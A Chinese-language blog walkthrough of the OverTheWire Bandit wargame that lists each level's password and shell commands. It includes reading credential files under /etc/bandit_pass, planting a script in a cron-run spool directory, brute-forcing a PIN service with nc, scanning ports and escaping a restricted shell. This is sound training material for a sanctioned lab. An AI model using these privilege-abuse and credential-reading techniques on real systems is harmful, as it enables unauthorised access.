overthewire bandit

发表于2020-05-17更新于2024-01-29

1 题目链接

https://overthewire.org/wargames/bandit/

2 解题过程

(0)

bandit.labs.overthewire.org, on port 2220

(1)

ssh bandit1@bandit.labs.overthewire.org -p 2220

boJ9jbbUNNfktd78OOpsqOltutMc3MY1

(2)

ssh bandit2@bandit.labs.overthewire.org -p 2220

CV1DtqXWVFXTvM2F0k09SHz0YwRINYA9
cat "spaces in this filename"
cat spaces\ in\ this\ filename

(3)

ssh bandit3@bandit.labs.overthewire.org -p 2220

UmHadQclWmgdLOKQ3YNgjWxGoRMb5luK

(4)

ssh bandit4@bandit.labs.overthewire.org -p 2220

pIwrPrtPN36QITSp3EQaw936yaFoFgAB

1
2
3
4
5
6
7
8
9
10
11
12
13
bandit4@bandit:~/inhere$ file ./-file*
./-file00: data
./-file01: data
./-file02: data
./-file03: data
./-file04: data
./-file05: data
./-file06: data
./-file07: ASCII text
./-file08: data
./-file09: data
bandit4@bandit:~/inhere$ cat ./-file07
koReBOKuIDDepwhWk7jZC0RTdopnAYKh

(5)

ssh bandit5@bandit.labs.overthewire.org -p 2220

koReBOKuIDDepwhWk7jZC0RTdopnAYKh

1
find ./ -type f -size 1033c

(6)

ssh bandit6@bandit.labs.overthewire.org -p 2220

DXjZPULLxYr17uwoI01bNLQbtFemEgo7

1
2
find ./ -size 33c -user bandit7 -group bandit6
cat ./var/lib/dpkg/info/bandit7.password

(7)

ssh bandit7@bandit.labs.overthewire.org -p 2220

HKBPTKQnIay4Fw76bEy8PVxKEDQRKTzs

1
grep -ri millionth

(8)

ssh bandit8@bandit.labs.overthewire.org -p 2220

cvX2JJa4CFALtqS87jk27qwqGhBM9plV

1
sort ./data.txt | uniq -u

(9)

ssh bandit9@bandit.labs.overthewire.org -p 2220

UsvVyFSfZZWbi6wgC7dAFyFuR6jQQUhR

1
strings ./data.txt | grep ====

(10)

ssh bandit10@bandit.labs.overthewire.org -p 2220

truKLdjsbJ5g7yyJ2X2R0o3a5HQJFuLk

1
2
bandit10@bandit:~$ base64 -d data.txt 
The password is IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

(11)

ssh bandit11@bandit.labs.overthewire.org -p 2220

IFukwKGsFW8MOq3IRFqrxE1hxTNEbUPR

1
2
bandit11@bandit:~$ cat data.txt | tr 'a-zA-Z' 'n-za-mN-ZA-M'
The password is 5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

(12)

ssh bandit12@bandit.labs.overthewire.org -p 2220

5Te8Y4drgCRfCx8ugdwuEX8KFC6k2EUu

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
 7  mkdir /tmp/bling
 8  cp data.txt /tmp/bling
 9  cd /tmp/bling
13  xxd -r data.txt data.bin
18  file data.bin
19  mv data.bin data.gz
20  gzip -d data.gz
22  file data
23  bzip2 -d data
25  file data.out
26  mv data.out data.gz
28  gzip -d data.gz
30  file data
31  tar -xvf data
33  file data5.bin
35  tar -xvf data5.bin
36  file data6.bin
37  bzip2 -d data6.bin
39  file data6.bin.out
40  tar -xvf data6.bin.out
45  file data8.bin
46  mv data8.bin data8.gz
48  gzip -d data8.gz
50  file data8
51  cat data8

(13)

ssh bandit13@bandit.labs.overthewire.org -p 2220

8ZjyCRiBWFYkneahHwxCv3wb2a1ORpYL

1
2
ssh bandit14@localhost -i sshkey.private
cat  /etc/bandit_pass/bandit14

(14)

ssh bandit14@bandit.labs.overthewire.org -p 2220

4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e

1
2
3
4
bandit14@bandit:~$ nc localhost 30000
4wcYUJFw0k0XLShlDzztnTBHiqxU3b3e
Correct!
BfMYroe26WYalil77FoDi9qh59eK5xNr

(15)

ssh bandit15@bandit.labs.overthewire.org -p 2220

BfMYroe26WYalil77FoDi9qh59eK5xNr

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
bandit15@bandit:~$ openssl s_client -connect localhost:30001
CONNECTED(00000003)
depth=0 CN = localhost
verify error:num=18:self signed certificate
verify return:1
depth=0 CN = localhost
verify return:1
---
Certificate chain
 0 s:/CN=localhost
   i:/CN=localhost
---
Server certificate
-----BEGIN CERTIFICATE-----
MIICBjCCAW+gAwIBAgIEDU18oTANBgkqhkiG9w0BAQUFADAUMRIwEAYDVQQDDAls
b2NhbGhvc3QwHhcNMjAwNTA3MTgxNTQzWhcNMjEwNTA3MTgxNTQzWjAUMRIwEAYD
VQQDDAlsb2NhbGhvc3QwgZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAK3CPNFR
FEypcqUa8NslmIMWl9xq53Cwhs/fvYHAvauyfE3uDVyyX79Z34Tkot6YflAoufnS
+puh2Kgq7aDaF+xhE+FPcz1JE0C2bflGfEtx4l3qy79SRpLiZ7eio8NPasvduG5e
pkuHefwI4c7GS6Y7OTz/6IpxqXBzv3c+x93TAgMBAAGjZTBjMBQGA1UdEQQNMAuC
CWxvY2FsaG9zdDBLBglghkgBhvhCAQ0EPhY8QXV0b21hdGljYWxseSBnZW5lcmF0
ZWQgYnkgTmNhdC4gU2VlIGh0dHBzOi8vbm1hcC5vcmcvbmNhdC8uMA0GCSqGSIb3
DQEBBQUAA4GBAC9uy1rF2U/OSBXbQJYuPuzT5mYwcjEEV0XwyiX1MFZbKUlyFZUw
rq+P1HfFp+BSODtk6tHM9bTz+p2OJRXuELG0ly8+Nf/hO/mYS1i5Ekzv4PL9hO8q
PfmDXTHs23Tc7ctLqPRj4/4qxw6RF4SM+uxkAuHgT/NDW1LphxkJlKGn
-----END CERTIFICATE-----
subject=/CN=localhost
issuer=/CN=localhost
---
No client certificate CA names sent
Peer signing digest: SHA512
Server Temp Key: X25519, 253 bits
---
SSL handshake has read 1019 bytes and written 269 bytes
Verification error: self signed certificate
---
New, TLSv1.2, Cipher is ECDHE-RSA-AES256-GCM-SHA384
Server public key is 1024 bit
Secure Renegotiation IS supported
Compression: NONE
Expansion: NONE
No ALPN negotiated
SSL-Session:
    Protocol  : TLSv1.2
    Cipher    : ECDHE-RSA-AES256-GCM-SHA384
    Session-ID: 007E0D8A0128B2FF4D905508CF737C9AA328D4D7EC300F3670BF87BF48F448AB
    Session-ID-ctx: 
    Master-Key: 0943896BA02534F6AD45C9F4FD218941160F569022FD88ADD3C91E5555A65B4E56FBAC7628F26A5703404039B9AF6C4D
    PSK identity: None
    PSK identity hint: None
    SRP username: None
    TLS session ticket lifetime hint: 7200 (seconds)
    TLS session ticket:
    0000 - aa 02 e6 3a 2e 0b c8 5d-6f 54 4a 1b 5a e0 2c 0e   ...:...]oTJ.Z.,.
    0010 - 2b 8e 00 de ab bf a4 f4-12 a3 29 78 f8 c9 c1 86   +.........)x....
    0020 - ff 7e ea db 76 0f 6c b8-45 ee 4c bd 2e 81 3f ff   .~..v.l.E.L...?.
    0030 - 81 ff c9 0d 2b 14 fe c9-28 84 1d 41 80 47 9f 9b   ....+...(..A.G..
    0040 - b6 72 e4 9e d1 80 c6 9c-d6 05 8c 58 31 b2 14 f3   .r.........X1...
    0050 - b5 ca 94 a9 02 01 7e b7-6d a1 7d 6d fb 07 9f b5   ......~.m.}m....
    0060 - 41 25 06 59 eb 61 d3 62-16 d3 69 35 5a b1 49 07   A%.Y.a.b..i5Z.I.
    0070 - 53 3f 04 5f f2 b7 e7 45-34 56 82 f5 6e 2e fe 0d   S?._...E4V..n...
    0080 - a9 cd a6 d5 ff 90 89 b1-a6 4c 82 8b 8b b8 a8 15   .........L......
    0090 - 95 6e d9 9f 0b bb 4a 9e-e2 01 60 c0 9c 44 a3 6a   .n....J...`..D.j

    Start Time: 1589699552
    Timeout   : 7200 (sec)
    Verify return code: 18 (self signed certificate)
    Extended master secret: yes
---
BfMYroe26WYalil77FoDi9qh59eK5xNr
Correct!
cluFn7wTiGryunymYOu4RcffSxQluehd

closed

(16)

ssh bandit16@bandit.labs.overthewire.org -p 2220

cluFn7wTiGryunymYOu4RcffSxQluehd

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
bandit16@bandit:~$ nmap -p 31000-32000 localhost

Starting Nmap 7.40 ( https://nmap.org ) at 2020-05-17 09:18 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00028s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE
31046/tcp open  unknown
31518/tcp open  unknown
31691/tcp open  unknown
31790/tcp open  unknown
31960/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
-------------------------------------------------------------------------------
bandit16@bandit:~$ nmap -sV -p 31000-32000 localhost

Starting Nmap 7.40 ( https://nmap.org ) at 2020-05-17 09:34 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00025s latency).
Not shown: 996 closed ports
PORT      STATE SERVICE     VERSION
31046/tcp open  echo
31518/tcp open  ssl/echo
31691/tcp open  echo
31790/tcp open  ssl/unknown
31960/tcp open  echo
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port31790-TCP:V=7.40%T=SSL%I=7%D=5/17%Time=5EC0E90B%P=x86_64-pc-linux-g
SF:nu%r(GenericLines,31,"Wrong!\x20Please\x20enter\x20the\x20correct\x20cu
SF:rrent\x20password\n")%r(GetRequest,31,"Wrong!\x20Please\x20enter\x20the
SF:\x20correct\x20current\x20password\n")%r(HTTPOptions,31,"Wrong!\x20Plea
SF:se\x20enter\x20the\x20correct\x20current\x20password\n")%r(RTSPRequest,
SF:31,"Wrong!\x20Please\x20enter\x20the\x20correct\x20current\x20password\
SF:n")%r(Help,31,"Wrong!\x20Please\x20enter\x20the\x20correct\x20current\x
SF:20password\n")%r(SSLSessionReq,31,"Wrong!\x20Please\x20enter\x20the\x20
SF:correct\x20current\x20password\n")%r(TLSSessionReq,31,"Wrong!\x20Please
SF:\x20enter\x20the\x20correct\x20current\x20password\n")%r(Kerberos,31,"W
SF:rong!\x20Please\x20enter\x20the\x20correct\x20current\x20password\n")%r
SF:(FourOhFourRequest,31,"Wrong!\x20Please\x20enter\x20the\x20correct\x20c
SF:urrent\x20password\n")%r(LPDString,31,"Wrong!\x20Please\x20enter\x20the
SF:\x20correct\x20current\x20password\n")%r(LDAPSearchReq,31,"Wrong!\x20Pl
SF:ease\x20enter\x20the\x20correct\x20current\x20password\n")%r(SIPOptions
SF:,31,"Wrong!\x20Please\x20enter\x20the\x20correct\x20current\x20password
SF:\n");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 88.00 seconds
------------------------------------------------------------------------
bandit16@bandit:~$ mkdir /tmp/bling2/
bandit16@bandit:~$ echo "cluFn7wTiGryunymYOu4RcffSxQluehd" | openssl s_client -connect localhost:31790 -quiet 2>/dev/null | tail -n 28 > /tmp/bling2/ssh.private
-----------------------------------------------------------------------
ssh -i ssh.private bandit17@localhost
cat /etc/bandit_pass/bandit17

(17)

ssh bandit17@bandit.labs.overthewire.org -p 2220

xLYVMN9WE5zQ5vHacb0sZEVqbrp7nBTn

1
2
3
4
5
bandit17@bandit:~$ diff passwords.old passwords.new
42c42
< w0Yfolrc5bwjS4qw5mq1nnQi6mF03bii
---
> kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

(18)

ssh bandit18@bandit.labs.overthewire.org -p 2220

kfBf3eYk5BPBRzwjqutbbfE887SVc5Yd

1
2
3
4
5
bling@bling:~$ ssh bandit18@bandit.labs.overthewire.org -p 2220 "cat readme"
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit18@bandit.labs.overthewire.org's password: 
IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

(19)

ssh bandit19@bandit.labs.overthewire.org -p 2220

IueksS7Ubh8G3DCwVzrTd8rAVOwq3M5x

1
2
bandit19@bandit:~$ ./bandit20-do cat /etc/bandit_pass/bandit20
GbKksEFF4yrVs6il55v6gwY5aVje5f0j

(20)

ssh bandit20@bandit.labs.overthewire.org -p 2220

GbKksEFF4yrVs6il55v6gwY5aVje5f0j

1
2
3
4
5
6
7
8
9
10
一个终端:
bandit20@bandit:~$ nc -l -p 2333 < /etc/bandit_pass/bandit20

另一个终端:
bandit20@bandit:~$ ./suconnect 2333
Read: GbKksEFF4yrVs6il55v6gwY5aVje5f0j
Password matches, sending next password

第一个终端接收到如下字符串:
gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

或者用一条命令完成

1
2
3
sh -c "nc -l -p 2333 & < /etc/bandit_pass/bandit20"; ./suconnect 2333
or 
sh -c "echo 'GbKksEFF4yrVs6il55v6gwY5aVje5f0j' | nc -l -p 2333 &";./suconnect 8888

(21)

ssh bandit21@bandit.labs.overthewire.org -p 2220

gE269g2h3mw3pwgrj0Ha9Uoqen1c9DGr

1
2
3
4
5
6
7
8
9
10
11
12
13
bandit21@bandit:~$ cd /etc/cron.d/
----------------------------------------------------------------------
bandit21@bandit:/etc/cron.d$ cat cronjob_bandit22
@reboot bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
* * * * * bandit22 /usr/bin/cronjob_bandit22.sh &> /dev/null
----------------------------------------------------------------------
bandit21@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit22.sh
#!/bin/bash
chmod 644 /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
cat /etc/bandit_pass/bandit22 > /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
----------------------------------------------------------------------
bandit21@bandit:/etc/cron.d$ cat /tmp/t7O6lds9S0RqQh9aMcz6ShpAoZKF7fgv
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

(22)

ssh bandit22@bandit.labs.overthewire.org -p 2220

Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
bandit22@bandit:~$ cd /etc/cron.d
bandit22@bandit:/etc/cron.d$ cat cronjob_bandit23
@reboot bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
* * * * * bandit23 /usr/bin/cronjob_bandit23.sh  &> /dev/null
bandit22@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit23.sh
#!/bin/bash

myname=$(whoami)
mytarget=$(echo I am user $myname | md5sum | cut -d ' ' -f 1)

echo "Copying passwordfile /etc/bandit_pass/$myname to /tmp/$mytarget"

cat /etc/bandit_pass/$myname > /tmp/$mytarget
bandit22@bandit:/etc/cron.d$ /usr/bin/cronjob_bandit23.sh
Copying passwordfile /etc/bandit_pass/bandit22 to /tmp/8169b67bd894ddbb4412f91573b38db3
bandit22@bandit:/etc/cron.d$ cat /tmp/8169b67bd894ddbb4412f91573b38db3
Yk7owGAcWjwMVRwrTesJEwB7WVOiILLI
发现不对,于是采用如下方法:
bandit22@bandit:/etc/cron.d$ echo I am user bandit23 | md5sum | cut -d ' ' -f 1
8ca319486bfbbc3663ea0fbe81326349
bandit22@bandit:/etc/cron.d$ cat /tmp/8ca319486bfbbc3663ea0fbe81326349
jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

(23)

ssh bandit23@bandit.labs.overthewire.org -p 2220

jc1udXuA1tiHqjIsL8yaapX5XIAI6i0n

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash

myname=$(whoami)

cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        owner="$(stat --format "%U" ./$i)"
        if [ "${owner}" = "bandit23" ]; then
            timeout -s 9 60 ./$i
        fi
        rm -f ./$i
    fi
done

1
2
3
4
5
6
7
8
9
10
mkdir /tmp/bling3
chmod 777 /tmp/bling3
cd /tmp/bling3
vim test.sh
	#!/bin/sh
	cat /etc/bandit_pass/bandit24 > /tmp/bling3/result24
chmod 777 test.sh
cp test.sh /var/spool/bandit24/test.sh
等待一会儿
cat result24

(24)

ssh bandit24@bandit.labs.overthewire.org -p 2220

UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
bandit24@bandit:/tmp/bling4$ vim test.py
--------------------
	#!/usr/bin/env python
	f = open('test.txt','w')
	for i in range(10000):
		payload = "UoMYTrfrBFHyQXmg6gzctqAwOmw1IohZ" + " " + str(i).zfill(4) + '\n'
		f.write(payload)
	f.close()
--------------------
bandit24@bandit:/tmp/bling4$ python test.py
bandit24@bandit:/tmp/bling4$ nc localhost 30002 < /tmp/bling4/test.txt > /tmp/bling4/result.txt
bandit24@bandit:/tmp/bling4$ sort ./result.txt | uniq -u

Correct!
Exiting.
I am the pincode checker for user bandit25. Please enter the password for user bandit24 and the secret pincode on a single line, separated by a space.
The password of user bandit25 is uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

(25)

ssh bandit25@bandit.labs.overthewire.org -p 2220

uNG9O58gUE7snukf3bvZ0rxhtnjzSGzG

1
2
3
4
5
把窗口调整到只能显示3/4行的状态
$ ssh -i bandit26.sshkey bandit26@localhost
在more界面执行命令
v - 进入编辑模式
r /etc/bandit_pass/bandit26

(26)

ssh bandit26@bandit.labs.overthewire.org -p 2220

5czgV9L3Xx8JPOyRbXh6lQbmIOWvPT6Z

1
2
3
4
5
6
7
8
把窗口调整到只能显示3/4行的状态
ssh登录上去,然后到more界面时,按v进入编辑模式,执行以下两条命令就可以获取shell
:set shell=/bin/sh
:shell
bandit26@bandit:~$ ls
bandit27-do  text.txt
bandit26@bandit:~$ ./bandit27-do cat /etc/bandit_pass/bandit27
3ba3118a22e93127a4ed485be72ef5ea

(27)

ssh bandit27@bandit.labs.overthewire.org -p 2220

3ba3118a22e93127a4ed485be72ef5ea

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
bandit27@bandit:~$ mkdir /tmp/bling
bandit27@bandit:~$ cd /tmp/bling
bandit27@bandit:/tmp/bling$ git clone ssh://bandit27-git@localhost/home/bandit27-git/repo
Cloning into 'repo'...
Could not create directory '/home/bandit27/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit27/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit27-git@localhost's password: 
remote: Counting objects: 3, done.
remote: Compressing objects: 100% (2/2), done.
remote: Total 3 (delta 0), reused 0 (delta 0)
Receiving objects: 100% (3/3), done.
bandit27@bandit:/tmp/bling$ ls
repo
bandit27@bandit:/tmp/bling$ cd repo
bandit27@bandit:/tmp/bling/repo$ ls
README
bandit27@bandit:/tmp/bling/repo$ cat README
The password to the next level is: 0ef186ac70e04ea33b4c1853d2526fa2

(28)

ssh bandit28@bandit.labs.overthewire.org -p 2220

0ef186ac70e04ea33b4c1853d2526fa2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
拉下repo后:
bandit28@bandit:/tmp/bling28/repo$ git log
commit edd935d60906b33f0619605abd1689808ccdd5ee
Author: Morla Porla <morla@overthewire.org>
Date:   Thu May 7 20:14:49 2020 +0200

    fix info leak

commit c086d11a00c0648d095d04c089786efef5e01264
Author: Morla Porla <morla@overthewire.org>
Date:   Thu May 7 20:14:49 2020 +0200

    add missing data

commit de2ebe2d5fd1598cd547f4d56247e053be3fdc38
Author: Ben Dover <noone@overthewire.org>
Date:   Thu May 7 20:14:49 2020 +0200

    initial commit of README.md

bandit28@bandit:/tmp/bling28/repo$ git reset --hard c086d11a00c0648d095d04c089786efef5e01264
HEAD is now at c086d11 add missing data
bandit28@bandit:/tmp/bling28/repo$ cat README.md 
# Bandit Notes
Some notes for level29 of bandit.

## credentials

- username: bandit29
- password: bbc96594b4e001778eee9975372716b2

(29)

ssh bandit29@bandit.labs.overthewire.org -p 2220

bbc96594b4e001778eee9975372716b2

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
拉下repo后:
bandit29@bandit:/tmp/bling29/repo$ git branch -a
* master
  remotes/origin/HEAD -> origin/master
  remotes/origin/dev
  remotes/origin/master
  remotes/origin/sploits-dev
bandit29@bandit:/tmp/bling29/repo$ git checkout origin/dev
Previous HEAD position was 786d5be... add some silly exploit, just for shit and giggles
HEAD is now at bc83328... add data needed for development
bandit29@bandit:/tmp/bling29/repo$ cat README.md 
# Bandit Notes
Some notes for bandit30 of bandit.

## credentials

- username: bandit30
- password: 5b90576bedb2cc04c86a9e924ce42faf

(30)

ssh bandit30@bandit.labs.overthewire.org -p 2220

5b90576bedb2cc04c86a9e924ce42faf

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
bandit30@bandit:/tmp/bling30/repo$ cd .git
bandit30@bandit:/tmp/bling30/repo/.git$ cat *
cat: branches: Is a directory
[core]
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
[remote "origin"]
	url = ssh://bandit30-git@localhost/home/bandit30-git/repo
	fetch = +refs/heads/*:refs/remotes/origin/*
[branch "master"]
	remote = origin
	merge = refs/heads/master
Unnamed repository; edit this file 'description' to name the repository.
ref: refs/heads/master
cat: hooks: Is a directory
DIRC^�3�
�^�3�     e
��$���+��!�L4 ]R?��֛��7w	README.mdTREE1 0
��Y.�U�����36:F��JGVVF*-`-��I���}u/)Qcat: info: Is a directory
cat: logs: Is a directory
cat: objects: Is a directory
# pack-refs with: peeled fully-peeled 
3aefa229469b7ba1cc08203e5d8fa299354c496b refs/remotes/origin/master
f17132340e8ee6c159e0a4a6bc6f80e1da3b1aea refs/tags/secret
cat: refs: Is a directory
bandit30@bandit:/tmp/bling30/repo/.git$ ls -al
total 52
drwxr-sr-x 8 bandit30 root 4096 May 17 14:52 .
drwxr-sr-x 3 bandit30 root 4096 May 17 14:52 ..
drwxr-sr-x 2 bandit30 root 4096 May 17 14:52 branches
-rw-r--r-- 1 bandit30 root  276 May 17 14:52 config
-rw-r--r-- 1 bandit30 root   73 May 17 14:52 description
-rw-r--r-- 1 bandit30 root   23 May 17 14:52 HEAD
drwxr-sr-x 2 bandit30 root 4096 May 17 14:52 hooks
-rw-r--r-- 1 bandit30 root  137 May 17 14:52 index
drwxr-sr-x 2 bandit30 root 4096 May 17 14:52 info
drwxr-sr-x 3 bandit30 root 4096 May 17 14:52 logs
drwxr-sr-x 4 bandit30 root 4096 May 17 14:52 objects
-rw-r--r-- 1 bandit30 root  165 May 17 14:52 packed-refs
drwxr-sr-x 5 bandit30 root 4096 May 17 14:52 refs
bandit30@bandit:/tmp/bling30/repo/.git$ git show --name-only secret
47e603bb428404d265f59c42920d81e5

(31)

ssh bandit31@bandit.labs.overthewire.org -p 2220

47e603bb428404d265f59c42920d81e5

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
将repo拉到本地后:
bandit31@bandit:/tmp/bling31/repo$ ls -al
total 20
drwxr-sr-x 3 bandit31 root 4096 May 17 15:00 .
drwxr-sr-x 3 bandit31 root 4096 May 17 14:59 ..
drwxr-sr-x 8 bandit31 root 4096 May 17 15:00 .git
-rw-r--r-- 1 bandit31 root    6 May 17 15:00 .gitignore
-rw-r--r-- 1 bandit31 root  147 May 17 15:00 README.md
bandit31@bandit:/tmp/bling31/repo$ echo "May I come in?" > key.txt
bandit31@bandit:/tmp/bling31/repo$ git add -f key.txt
bandit31@bandit:/tmp/bling31/repo$ git status
On branch master
Your branch is up-to-date with 'origin/master'.
Changes to be committed:
  (use "git reset HEAD <file>..." to unstage)

	new file:   key.txt

bandit31@bandit:/tmp/bling31/repo$ git commit -m "add"
[master 93d69fa] add
 1 file changed, 1 insertion(+)
 create mode 100644 key.txt
bandit31@bandit:/tmp/bling31/repo$ git push origin master
Could not create directory '/home/bandit31/.ssh'.
The authenticity of host 'localhost (127.0.0.1)' can't be established.
ECDSA key fingerprint is SHA256:98UL0ZWr85496EtCRkKlo20X3OPnyPSB5tB5RPbhczc.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/bandit31/.ssh/known_hosts).
This is a OverTheWire game server. More information on http://www.overthewire.org/wargames

bandit31-git@localhost's password: 
Counting objects: 3, done.
Delta compression using up to 2 threads.
Compressing objects: 100% (2/2), done.
Writing objects: 100% (3/3), 315 bytes | 0 bytes/s, done.
Total 3 (delta 0), reused 0 (delta 0)
remote: ### Attempting to validate files... ####
remote: 
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote: 
remote: Well done! Here is the password for the next level:
remote: 56a9bf19c63d650ce78e6ec0354ee45e
remote: 
remote: .oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.oOo.
remote: 
To ssh://localhost/home/bandit31-git/repo
 ! [remote rejected] master -> master (pre-receive hook declined)
error: failed to push some refs to 'ssh://bandit31-git@localhost/home/bandit31-git/repo'

(32)

ssh bandit32@bandit.labs.overthewire.org -p 2220

56a9bf19c63d650ce78e6ec0354ee45e

1
2
3
4
5
>> $0
$ ls
uppershell
$ cat /etc/bandit_pass/bandit33
c9c3199ddf4121b10cf581a98d51caee

(33)

ssh bandit33@bandit.labs.overthewire.org -p 2220

c9c3199ddf4121b10cf581a98d51caee

1
题目还没出来

3 参考

Linux 闯关游戏之通关秘籍

Wargames